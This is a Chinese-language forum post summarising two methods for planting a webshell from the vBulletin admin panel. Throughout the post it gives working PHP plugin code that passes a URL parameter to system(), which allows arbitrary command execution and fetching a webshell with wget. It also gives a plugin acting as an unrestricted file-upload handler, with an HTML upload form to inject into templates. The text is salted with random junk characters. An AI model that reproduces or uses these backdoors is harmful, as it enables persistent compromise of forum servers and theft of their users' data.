返回列表 发帖
vBulletin后台获取webshell方法总结
方法一:
1 [5 j8 q) ~3 s4 T# }" t2 l, \* a) N9 \  u首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。0 L" N1 P. t5 ^  E
; A  L0 H* ]8 m  W7 [8 G6 z5 ^6 s& ^9 W
方法二:8 y+ R. R3 i1 i8 V7 j
前边相同,代码处写一个接收上传的代码:
0 b% L5 R; Q- ~7 n/ Q' V
$target_path = "images/avatars"; //注意权限要为可写的

" u8 O$ c# J! X% _: U( Q
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

* z8 G5 m, G! a5 C. k' s1 [
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
) l0 w) f0 d( Y$ q9 I7 f5 ?    echo "The file ". basename( $_FILES['uploadedfile']['name']). ( @: }6 w8 D- C+ T0 B
    " has been uploaded";
3 ~9 J/ \1 \& ]} else{ ! B# K' ^; W. B
    echo "There was an error uploading the file, please try again!";
8 f& E; t# ~  W0 e' \, I}

$ T: V. A" Z& V& b) [
   然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:

( G! Z' d2 y* E1 C. S
<form enctype="multipart/form-data" action="ajax.php" method="POST"> ! k: [6 p! o. z, g
<input type="hidden" name="MAX_FILE_SIZE" value="100000" /> ( s9 _7 d& g' S: [% k7 B" z5 w* t
Choose a file to upload: <input name="uploadedfile" type="file" /><br /> ) G# Z, W) G: V; H
<input type="hidden" name="s" value="$session[sessionhash]" /> ; O4 T& I2 F8 y4 Z. P3 n$ ?. Y
<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" /> ; N* G* f' I! ?7 g, j( K
<input type="submit" value="Upload File" />
5 C$ A( H7 h+ Z6 I</form>
' c3 y: B* I) z+ `0 @: m  i
保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用
# q, T2 H* m6 V* Q4 X( o7 Y
% T. q0 Z9 l. |, _3 M7 i& d
, X% v6 Q. |5 i/ v! N

. S  ]5 G+ B0 Z! P; X5 y) v/ k7 G) q
' X; b8 F# ]+ y5 n8 p

6 a4 O) ^* Z  Q" s5 T  p+ i5 j! g# N/ T! |( k, d

7 b- C9 L' ?2 ~4 H. z# f- W$ i% a  u' c2 B4 X8 l& V

" C. z( M. Q. w/ n# z5 W2 p5 Q

8 O! M2 d* g/ F4 b) Y0 [" s. C0 [7 D/ ~' |3 s8 F

- Z6 Y( O6 P- Y, i. V
1 q+ O/ K% s* T" L4 \# o; I5 B" F4 k4 ^9 V. k3 y% N
3 ?4 R3 [0 L6 r1 w
0 C' s" p( C6 ~8 o1 a) o& H

. ]' n( {) X  b* r0 F. _9 @! b
1 H- n3 B; H3 b8 i1 b9 v& K* K公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

浙江政安信息安全研究中心招贤纳士啦!

启明星辰研发招聘

合优网站管理系统存在SQL注射。。。原创首发~

联想研究院 安全职位

PHP VS ASP

计算机硬件维护知识

TOP

返回列表